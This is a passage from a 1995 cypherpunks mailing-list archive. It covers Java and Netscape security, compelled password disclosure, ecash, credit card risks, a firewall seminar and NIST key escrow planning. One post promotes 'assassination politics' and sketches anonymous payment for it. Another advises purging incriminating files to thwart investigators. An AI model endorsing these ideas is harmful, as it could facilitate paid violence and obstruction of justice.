for a longer and few crashes are repeatable.  Plus lots of new gizmos,
the certificate authority interface (thanks Jeff).

I've got to note just one thing -- what about the Netscape LiveScript
language?  is it opening up the same security can of worms as java?  I
realise that it provides functionality specific to browsing only (no
network/files) but the potential for bugs when you add another
language must increase.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 00:10:48 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <199511171546.KAA17869@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain



>>9. Subject to legal privileges or protection, most legal systems permit
>>investigating authorities to order persons to hand over objects under
>>their control that are required to serve as evidence. In a parallel
>>fashion, provisions should be made for the power to order persons to
>>submit any specified data under their control in a computer system in the
>>form required by the investigating authority.
>>________________________________________________________________________
>
>>Is this 'what we would want'? It clearly means that one can be ordered
>>to reveal the password to encrypted data and punished by law if one
>>refuses.

Forgive me if this point has already been raised, but couldn't an 
objection to such laws be based on the protection against 
self-incrimination? 

Maybe this all depends on whether the legal context is a civil or a 
criminal proceeding. If I'm being sued and they ask me at a deposition
whether I did such-and-such, I can't take the Fifth (or can I?). But 
if I'm accused of murder, the police can't make me tell them where I've 
buried the knife. However, if I have a wall safe and they 
get a warrant to search it, can I be jailed for contempt if I don't 
give them the combination? 

This seems to be a case where existing legal paradigms ought to 
extend rather naturally. Whether the existing paradigms are any 
good or not is of course a separate question. 

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 18 Nov 1995 03:34:04 +0800
To: Arley Carter <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
Message-ID: <199511171905.LAA27110@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15:22 11/16/95 -0500, Arley Carter wrote:
>3.  I'm getting tired of seeing posts this list about what is more dangerous
>cyberspace or restaurantspace.  Let's focus on the real mechanics of how
>the ground rules of credit card clearing will operate in cyberspace. The
>credit card consortiums can advance the cause of electronic commerce by
>stating in unambigous terms what their views are of these ground rules.
>Developers, cardholders and merchants can then make a judgement on whether
>those risks are acceptable to each party respectively.  

I agree.  I doubt we can completely eliminate the risk by technical fixes. 
I do think we may be able to reduce the risk below what it is in
non-cyberspace commerce.  (e.g. phone orders and in-person card
presentation).  If we can do that, and a significant part of commerce moves
to cyberspace, then we can see a reduction in the fraud premium that we all
pay (no matter who "offically" pays for it).

While cash-like instruments will be an important part of cyberspace, I
think that credit arangements may be more important.  In non-cyberspace
commerce, almost all big-ticket purchases are made with time-payment
credit.  Whether the total of the "candy bar" transactions will exceed the
total to the big-ticket transactions, I don't know.  Certainly if we are
dealing with tangable goods, shipping costs encourage large orders.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 03:09:56 +0800
To: sameer <sameer@c2.org>
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <m0tGVUJ-0008xnC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>> 	I will as soon as someone comes up with a _fully_ private digital
>> cash system and starts using it for something. As I understand it, Chaum's
>> ecash system is not one (i.e., non-privacy to the sender and of amounts
to the
>> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>> immediately (if there's a text-based interface).
>
>	ecash provides full payor anonymity. Payee anonymity is
>currently not possible, but that is being worked on. 
>
>	If you used ecash to pay for a c2.org account, neither I nor
>the bank would be able to trace the payment into the c2.org account to
>an actual account at mark twain bank.
>sameer						Voice:   510-601-9777
>Community ConneXion				FAX:     510-601-9734

If you've been following my idea, "assassination politics," you know that
there is an excellent use for payee-anonymous digital cash.  

It seems to me that this should be possible, within limits, if the potential
payee could generate a "blinded" note to be delivered to the payer by
anonymous means.  The payer could get the note certified by the bank,
possibly given an extra "blind" if necessary  (is this possible? Desirable?
Why not?) and then the resulting still-blinded but certified note is posted
(in encrypted form, I supposed) to the 'net so that only the payee can
decrypt and unblind it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Sat, 18 Nov 1995 00:45:25 +0800
To: cypherpunks@toad.com
Subject: Re: SA: Confidential Communication on the Internet
In-Reply-To: <Pine.SUN.3.90.951117010848.21461A@dfw.net>
Message-ID: <199511171627.LAA17236@fuseki.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"ao" == Aleph One <aleph1@dfw.net> writes:

ao> On the December issue of Scientific American there is an article
ao> by Thomas Beth, "Confidential Communication on the Internet".
ao> Lite on the technical side but good reading anyway.

  This seemed to be a duplication of an X.509 certificate hierarchy:
``Hey, I don't know who you are but you have a seals which go back to
a CA I trust.'' In this respect the information seemed unworthy of an
article in SA.

Perhaps I did not read the article closely enough?

michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 18 Nov 1995 17:06:57 +0800
To: don@cs.byu.edu
Subject: Re: Ecash account
In-Reply-To: <199511170930.CAA00682@wero.byu.edu>
Message-ID: <9511171032.AA10628@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes:
 > So who here is going to use their ecash account to set up a money
 > lau^H^H^Hexchange service?

I have one, sort of, the rates are quite high though, It's my casino, 
( http://www.box.eu.org/~dl/inc/play.shtml )
[If you play an infinite number of times, you will have statistically
received 89% of what you've bet. So Its an 11% fee exchange service
somehow :-)]

For obvious reasons, it works only with CyberBucks though...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Greenpeace Ortega Marxist Qaddafi Chirac Soviet domestic disruption




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Sat, 18 Nov 1995 02:43:00 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <199511171810.MAA09890@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


smithmi@dev.prodigy.com (Michael Smith) said:

>>> 9. Subject to legal privileges or protection, most legal systems
>>> permit investigating authorities to order persons to hand over
>>> objects under their control that are required to serve as
>>> evidence. In a parallel fashion, provisions should be made for the
>>> power to order persons to submit any specified data under their
>>> control in a computer system in the form required by the
>>> investigating authority.
>>> ________________________________________________________________________
>> Is this 'what we would want'? It clearly means that one can be
>> ordered to reveal the password to encrypted data and punished by law
>> if one refuses.

MS> Forgive me if this point has already been raised, but couldn't an
MS> objection to such laws be based on the protection against
MS> self-incrimination?

MS> Maybe this all depends on whether the legal context is a civil or a
MS> criminal proceeding. If I'm being sued and they ask me at a
MS> deposition whether I did such-and-such, I can't take the Fifth (or
MS> can I?). But if I'm accused of murder, the police can't make me tell
MS> them where I've buried the knife. However, if I have a wall safe and
MS> they get a warrant to search it, can I be jailed for contempt if I
MS> don't give them the combination?

	Well, IANAL, but yes, I believe that you can be.  Or, worse,
obstruction of justice.  Especially if they cut it open and find that
the knife was in the safe.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 18 Nov 1995 02:46:33 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511161831.ZM14572@glacius.alias.com>
Message-ID: <9511171814.AA23432@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Frederick B. Cohen writes:
 > This is baloney.  When you work for Netscape or Sun and speak about your
 > company's products, you are representing the company whether you
 > disclaim it or not.

Baloney.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 18 Nov 1995 02:23:12 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <9511171800.AA07897@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Forgive me if this point has already been raised, but couldn't an 
>objection to such laws be based on the protection against 
>self-incrimination? 

There is no such right in most (if not all) european countries. In
France there is not even the presumption of innocence.

The British Conservatives have recently passed a criminal justice
Bill which abolishes the right to silence and most other protections
for the defendant. They are busy writing another.

That is not to say US politicians are any better. Congress is busily 
rolling back on all the protections they can. Got to fill those jails
somehow you know.

	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 18 Nov 1995 02:54:29 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <199511171827.NAA26980@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 	When Postscript allows writing to files, most Web browsers
> become insecure - including Netscape, including HotJava.  If the only
> commonly available postscript programs are insecure, the products have
> hooks designed to allow postscript to be used automatically to interpret
> programs from over the net, and servers commonly provide information in
> postscript format, the enabling technology (i.e., Netscape and Hot Java)
> is responsible for the vulnerability.

   [This is my last response on this subject.] This is a non-sequitur.
Providing hooks for third-party add ons does not make Netscape
responsible for damage done by third party products. If you believe
this is true, find me a legal precedent for it. It doesn't make sense
on a purely intellectual level. If you produces a product that has the
ability to be ugpraded, and someone upgrades it with dangerous
third party products, how can you control that? The only way to assure
against it is to not allow upgrades of functionality except by 
your own company. This throws the whole idea of reusable software,
device independence, and building "platforms" right out the window.
It's the kind of logic that seeks to make bars responsible for
drunk drivers. Indeed, Microsoft and Apple should be held responsible
for dangerous "applications" that their computers can execute.

   I don't know anyone who has a postscript viewer configured in Netscape
and I suspect the vast majority of people using Netscape don't even
have the knowledge to do it. Your comments are not significant and
the threat is minor. If you had actually exposed a threat to the
JavaVM/Classloader model, which might be installed on a sizable
portion of browser machines, you might have a point. But since
your postingas have made it clear that you haven't read or understood
the Java papers (besides the white paper), nor have you looked at
the actual implementation, your comments are essentially meaningless.
You seem fixated on what is, a semantic argument about what "safe"
or "secure" means.  (e.g. your comments on MD5)  You expect these
words to have a binary meaning. Either something is safe/secure or it isn't.

The world is a lot more fuzzy than that.

-Ray









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: viking@pacifier.com (Robert East)
Date: Sat, 18 Nov 1995 06:56:57 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <m0tGYiZ-0008zoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>>MS> However, if I have a wall safe and
>>MS> they get a warrant to search it, can I be jailed for contempt if I
>>MS> don't give them the combination?
>>
>>	Well, IANAL, but yes, I believe that you can be.  Or, worse,
>>obstruction of justice.  Especially if they cut it open and find that
>>the knife was in the safe.
>
>So presumably the same would apply to the password that unlocks my 
>PGP private key. But there's an interesting twist. Once they open 
>up the wall safe, they can see for sure what is and isn't in it. This 
>ain't necessarily so for an encrypted file. Suppose my software has the 
>fiendish sophistication to disgorge different keys depending on what 
>password was given, and different pieces of cleartext depending 
>on what key was used. (Again, I apologize if this notion has already 
>been extensively discussed.) Is there a way to set it up such that 
>the cops couldn't be sure -- even using a logic analyzer -- that I 
>hadn't given them the complete set of keys, so as to read all the 
>cleartexts in the file? Assume that cyphertext files are guaranteed 
>to be larger, by some random factor, than the sum of all the cleartexts 
>in them, so the mere fact that a smaller quantity of cleartext was 
>disgorged than cyphertext supplied would tell them nothing. I guess this 
>is a kind of steganography, isn't it? Or at least something similar -- 
>the point would be that they couldn't tell genuine cyphertext from 
>camouflaging noise, without the key that tells them where to look. 
>
>Which brings us, in turn, to the bottom line: the only things we 
>can be certain the bad guys _won't_ do, are the things they _can't_
>do. 
> 
>
>--Michael Smith

The interesting thing about PGP is that any incriminating cypher text one
might have on his or her hard disk would, most likely, be in someone else's
public key.  So, even if they had your secret key the only thing that could
be uncovered would be cyphertext that someone else had written to you.
Granted, that this could be incriminating but, then again, not necessarily.
I'm sure that for the purposes of conducting a criminal investigation, your
own cyphertext would be far more incriminating than someone else's. (The
above is only true unless you use the single key encryption option offered
for personal files in which case your files would be readable.) 

What one should be more concerned with is sloppy handling of plain text files
used prior to encryption.  A good example of that is if you're using Windows
based applications such as MS Winword.  It has an auto-store function that
generates a "Temp" file.  Such files aren't wiped in the same fashion that PGP
uses when it wipes a text file prior to encryption.

I think that the paramount thing to consider is if you have something to
hide then it is best to store it is inside your head.  Any computer based
storage system is bound to have certain limitations that may be bridged by a
determined government agency.  The other alternative is to ensure that
potentially incriminating files be purged regularly to avoid such potential
problems.

Robert East
viking@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sat, 18 Nov 1995 01:45:50 +0800
To: firewalls@greatcircle.com
Subject: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY TOOL
Message-ID: <"swan.cl.cam.:178540:951117141816"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Executive summary
=================

Any non UK site interested in seeing an MBone transmitted seminar on 21st 
November at 16:15 UTC entitled "FIREWALLS AS A NETWORK SECURITY TOOL" should 
contact me to get the IP address and TTL changed.


Plug, caveat, etc
=================

To enable "lone" security reseachers (i.e. not enough people in the dept to 
have regular Security Seminars) in the UK to "keep in touch", we transmit our 
departmental Security Seminars on the MBone each week, with a low TTL and 
administratively scoped to the UK (so we don't have to worry about clashing 
with other events. The AC.UK MBone is fully pruning, and typically has spare 
bandwidth).
These are not big formal events, but typically have a dozen or two members of 
the department and other "locals" present.
The termly program is available on the Web in http://www.cl.cam.ac.uk/Seminars
under "Security seminars" [ That way you can see our more formal "Departmental 
Seminars" listing at the same time :-) ]
It's run as a "DIY" service (i.e. members of the group set things up) so 
things may go amiss. However, if they do (or there are time zone problems) it 
is fairly simple to retransmit later (during UK office'ish hours -- unless 
someone has some magic to start up vat and vic or nv without using X) from the 
tape we make ...


Full details
============

As Firewalls are of interest to both these lists (sorry for cross posting!) I 
thought I might take this oportunity to draw your attention to this particular 
seminar. See http://www.cl.cam.ac.uk:80/Seminars/mbone.html for the latest 
info (e.g. slides will appear when I get them), but here is the announcement 
(roughly) as I received it:

                       ***   ***   ***   ***   ***

                  University of Cambridge Computer Laboratory

                            SECURITY SEMINAR SERIES

SPEAKER:	Alec Muffett, Sun Microsystems
DATE:		Tuesday 21st November at 4.15pm
PLACE:		Room TP4, Computer Laboratory
TITLE:		FIREWALLS AS A NETWORK SECURITY TOOL

The "Firewall" - taking the (quite broad) definition of a firewall's
being any device designed (in some manner) to restrict "soft" access
to a network - has migrated from being a tool of the paranoid systems
administrator, into being a standard part of modern network
infrastructures.

This seminar will review why this situation has come about, what
modern firewall architectures (both basic and advanced) look like,
examine what they can/cannot accomplish, and will speculate upon the
future potential of firewalls as access-security devices.


                         ***   ***   ***   ***   ***

As noted above, by default these are normally restricted to UK MBone sites,
so let me know in advance (the M/C IP address changes !) if it wanted further 
afield.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 04:21:49 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <199511171958.OAA30121@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>>Forgive me if this point has already been raised, but couldn't an 
>>objection to such laws be based on the protection against 
>>self-incrimination? 
>
>There is no such right in most (if not all) european countries. In
>France there is not even the presumption of innocence.

[Further depressing news deleted]

Yes, this was my understanding. I guess the point I was groping 
toward was that while  we could hardly expect that our rights vis-a-vis
electronic privacy would be any _better_ than our rights in 
obviously analogous non-electronic areas, they might well be worse;
it's important to be clear, and to make clear, that what rights 
we have left have obvious extensions to our net.activities, and 
try to prevent the thin end of the wedge from being inserted in 
our portion of the perimeter.

Of course, this only applies to the set of people who live in 
countries where people _have_ any rights, and as Phill implies, 
that may soon be the null set.   

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 07:57:19 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511172312.PAA22826@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

On Wed, 15 Nov 1995, Howard Melman wrote:

> Vladimir Z. Nuri wrote: 
> > attempts to get secure credit card number transfer on the internet are
> > not an end in themselves. they are the first steps toward an entirely
> > new transaction system. those who see a single step and criticize it 
> > as feeble in the context of past systems are missing the point and
> > apparently can't think past the present nanosecond of their lives. 

My grandfather used to say, that the first horse to break from the gate,
isn't necessarily the first to cross the finish line. 

Often, he'll be pulling up the rear.

> You'll have a hard convincing folks that they need something
> better than what works perfectly well today.

In my humble opinion, the present system can't really be characterized as
"working perfectly well".  Far from it.  

While not as familiar with the US system as the Canadian, I can give as a
simple example, the bank clearing system for paper checks.  In Canada, we
can clear a check from one side of the country to the other overnight.  We
have 24 hour clearing.  While this is far from "perfect", our existing
paper systems allow for a degree of efficiency which I don't believe is
engineered into the US clearing system. 

Perhaps someone can correct me, if I have erred but I think it takes far
longer than 24 hours to clear a check drawn on any US bank, and deposited
to any other bank's credit in the United States.  It may work
"functionally" ... but certainly far from "perfectly" nor "efficiently". 

> Here's another point that I didn't see in your list.  Today it might be
> just as safe to send your CC# over the internet as giving it to a clerk,
> etc.  This is mostly because the number of CC#'s sent over the net vs 
> the whole traffic is small.  It is therefore not very cost effective to
> try to steal credit card numbers over the net vs other means (searching
> through dumpsters, taping a phone line near LL Bean, etc.). 

A very good point.  But then, dumpster-diving attacks could be moderated
by simply implementing carbonless forms.  No carbon, reduces a lot of the
risks.  It's basic risk management. 

All of this becomes a part of the cost/benefit analysis, and is part of
the function of security policy.  It's very much like all the talk on
another thread on this list about Java security. 

There is no point in even discussing Java security in Netscape, when
Netscape PRESENTLY has existing security holes written into the very
fabric of the existing installed codebase.  Holes which Netscape and AT&T
refuse to address, correct or even comment on. 

Sun's security approach misses the point.  Putting dead-bolts on houses
while leaving all of the windows open, just doesn't address the problem. 
It really misses the mark. 

> If CC# purchases became common over the net, it would become much more
> valuable to try to steal them from the net and more people would.  It
> would then become much less secure, not for any technical reason but
> because there will be more crooks exploiting the existing flaws. 

This is also unfortunately true.  Information on how to "break" a system
does propagate.  As more people know how to exploit a system, or as more
people learn how to utilize the "letter of the rules" (the "code") rather
than the "spirit" (the "intent") the degree of exploitation grows. 

Ask any executive in the Gaming Industry about this.

Black-Jack card-counting went through an evolution in exactly this
fashion.  Many casinos lost a veritable "fortune" to good card counters. 
They lost to organized "teams" of card counters.  Counters who literally
broke the bank. 

Systems always have exploitable features.  And new systems will always
present new opportunities for exploitation. A completely new set of risks
which are additive to those already in place, even those which may not 
yet be in a state of active exploitation.

A pertinent network example: credit card numbers.

Credit card numbers are not just a set of random digits.  Only particular
patterns of numbers can be valid.  This existing "security provision" --
check digits -- actually ends up opening a security hole when we look at
transmitting credit card numbers via the Internet. 

The security feature on one side of the ledger makes it far easier to
differentiate between what is a random set of numbers, and what is in fact
a valid CC number.  Simple pattern analysis allows to search for valid
numbers.  

It makes the potential "crooks" job much easier and its already engineered 
into the system.  

The "credit card number" risk though is accidental, while the Netscape
Navigator risk isn't accidental at all, it's willful. 



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 05:06:49 +0800
To: Sten Drescher <cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
Message-ID: <199511172019.PAA30181@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


>MS> However, if I have a wall safe and
>MS> they get a warrant to search it, can I be jailed for contempt if I
>MS> don't give them the combination?
>
>	Well, IANAL, but yes, I believe that you can be.  Or, worse,
>obstruction of justice.  Especially if they cut it open and find that
>the knife was in the safe.

So presumably the same would apply to the password that unlocks my 
PGP private key. But there's an interesting twist. Once they open 
up the wall safe, they can see for sure what is and isn't in it. This 
ain't necessarily so for an encrypted file. Suppose my software has the 
fiendish sophistication to disgorge different keys depending on what 
password was given, and different pieces of cleartext depending 
on what key was used. (Again, I apologize if this notion has already 
been extensively discussed.) Is there a way to set it up such that 
the cops couldn't be sure -- even using a logic analyzer -- that I 
hadn't given them the complete set of keys, so as to read all the 
cleartexts in the file? Assume that cyphertext files are guaranteed 
to be larger, by some random factor, than the sum of all the cleartexts 
in them, so the mere fact that a smaller quantity of cleartext was 
disgorged than cyphertext supplied would tell them nothing. I guess this 
is a kind of steganography, isn't it? Or at least something similar -- 
the point would be that they couldn't tell genuine cyphertext from 
camouflaging noise, without the key that tells them where to look. 

Which brings us, in turn, to the bottom line: the only things we 
can be certain the bad guys _won't_ do, are the things they _can't_
do. 
 

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 08:04:27 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511172322.PAA23877@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

On Thu, 16 Nov 1995, Vladimir Z. Nuri wrote:


> but one distinction I do realize has to be made in all this is the
> difference between "fraud" and "breaking a system". the latter is
> a far more potentially serious problem with cryptographic security than
> the former. in fact cryptographic security attempts to deal with all
> fraud by making "breaking the system" impossible, and succeeds to the
> degree it accomplishes this.

I think this is extremely important to consider.  The functions which
define relationships between large numbers of variables, (such as say the
world economy) -- these functions are not "idiot proof". 

They can collapse.  And, yes Virginia, the system can be "broken".

To suggest that cryptography can address this issue is to misunderstand
the problem, and is part of this whole mindset that "security" is
cryptography. 

Our economies are, if anything, less resilient than they were in the not
to distant past.  They are far more vulnerable.  The introduction of new
business practices, such as the reduction in most firms inventories, and
the ever greater reliance on "just in time" approaches has made us far
less able to sustain any interruption. 

The headlong introduction of "new variables" and new vectors into an
unstable system has never been "sound policy".  

I guess it's sort of like what happened when rabbits were introduced into
Australia.  An eco-catastrophe. 

Perhaps, we can all agree that existing systems are best "not
destabilized".  Then again, I'm not the one who gets his jollies by
rocking the boat.  I get mine elsewhere.

I guess here then is the real question, what is the fallback plan when 
something does go catastrophically wrong??  What then, hand-wringing, and 
saying that it "exceeded our theoreticians predictive capabilities" just 
does not suffice.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 18 Nov 1995 04:59:47 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in UK ?
In-Reply-To: <Pine.BSD.3.91.951117025209.5772G-100000@ahcbsd1.ovnet.com>
Message-ID: <199511172025.PAA13462@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Could you please explain what this has to do with cryptography?

"James M. Cobb" writes:
>  
> 11 16 95 The Electronic Telegraph runs a newsstory headed 
>  
>    Doorstep polish researcher was whiplash injuries spy 
>  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Sat, 18 Nov 1995 09:51:46 +0800
To: cypherpunks@toad.com
Subject: Dec 5th KE meeting details
Message-ID: <9511172033.AA09548@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 13 Nov 1995 13:15:32 -0500
From: Elaine Frye <frye@micf.nist.gov>


November 8, 1995


To:  Key Escrow Distribution Lis

From:  Ed Roback, NIST

Subject:  Planning for December 5th Meeting

At the September 6-7, 1995 key escrow issues meeting, I received a number of
comments that the government presentations should have addressed more topics
in greater detail.  To respond to this concern, I would like to request
submissions of any specific questions/issues related to the draft criteria
that you would like to see addressed on December 5th.  I cannot guarantee we
can meet all requests, but your suggestions will greatly help in planning
the meeting agenda and government presentations.

Please forward your questions/issues/ideas to me via e-mail at
"edward.roback@nist.gov", fax at 301-948-1784 or telephone on 301-975-3696.  

FYI, the current outline for the December 5 meeting is as follows:

A.      Government presentation of draft criteria, followed by Q&As

B.      Industry presentations on draft criteria

C.      Breakout sessions on criteria
          (a suggestion has been made to also have one on policy issues)

D.      Reports from breakout sessions

E.      Wrapup

Remember, also, that if you would like to make a presentation at the
meeting, you are asked to contact Elaine Frye at "elaine.frye@nist.gov".
You may also bring written comments to the meeting for distribution (our
estimate is that 250 copies are necessary.)

Thank you.
*****************************************************
Elaine Frye
Computer Systems Laboratory, NIST
Bldg. 225/Rm.B154
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1784
*****************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sat, 18 Nov 1995 08:13:28 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
Message-ID: <199511172357.PAA03710@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
>
>Community ConneXion today announced that it has become the first and
>only Internet Service Provider in the world to allow for payment using
>ecash, a digital cash system developed by DigiCash bv, of Amsterdam,

And, er, we're second. Ditch that 'only' part :)
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 08:36:19 +0800
To: cypherpunks@toad.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511180014.QAA29549@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 Nov 1995, Bill Stewart wrote:

> >>Does anyone know the ostensible justification for this?  
> 
> Isn't the NCSA government-funded?  If so, they've probably got
> less slack in what they can get away with than private citizens;

I think that government-funding does give a certain degree of control --
the control that comes with the budget axe.  Private citizens
alternatively, get to face a different type of tool. 

They get to face stuff like RICO provisions, which "effectively" -- as
they are presently used, rather than as they were written and intended to
be used -- tend to allow the government to "influence" private citizens. 

> the NSA's got more leverage over their funding, especially if
> "Supercomputer Applications" are often military or civilian-govt.

I doubt that the NSA approves the NCSA's budget.

Far more likely would be for the NSA to use a rogue programmer at the
NCSA.  Someone who might hide some very damaging code into one of the
existing applications without anyone (else) knowing about it. 

I could even see an independent doing this simply to profit from it.  I
could see someone doing something like that.  It's no different really
than the "free" programs that were given away years ago which appeared to
be useful but actually contained "poison code". 

> Not only do they have to worry about ITAR as law, they have to
> worry about their continued cash flow.

Like I said, I don't believe in the "grand conspiracy" model.  I tend
toward "contained" enterprises. 

All the more reason though, NEVER to use black-box code, and all the more 
reason for public open review of code.  NSA and ITAR aside ... safe 
computing is safe computing and is in everyone's collective interest.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 18 Nov 1995 06:01:58 +0800
To: Michael Smith <smithmi@dev.prodigy.com>
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <199511171958.OAA30121@tinman.dev.prodigy.com>
Message-ID: <Pine.SUN.3.91.951117154130.3578F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


sorry, but there is a right to remain silent in Europe:

[quoting from footnote 360 (whatsamatter you didn't get that far?) of my
Clipper paper:] 

The European court of Human Rights recently ruled that the
right to right to remain silent is guaranteed under the European
Convention on Human Rights (formerly known as the Convention for the
Protection of Human Rights and Fundamental Freedoms), Nov. 4, 1950, art.
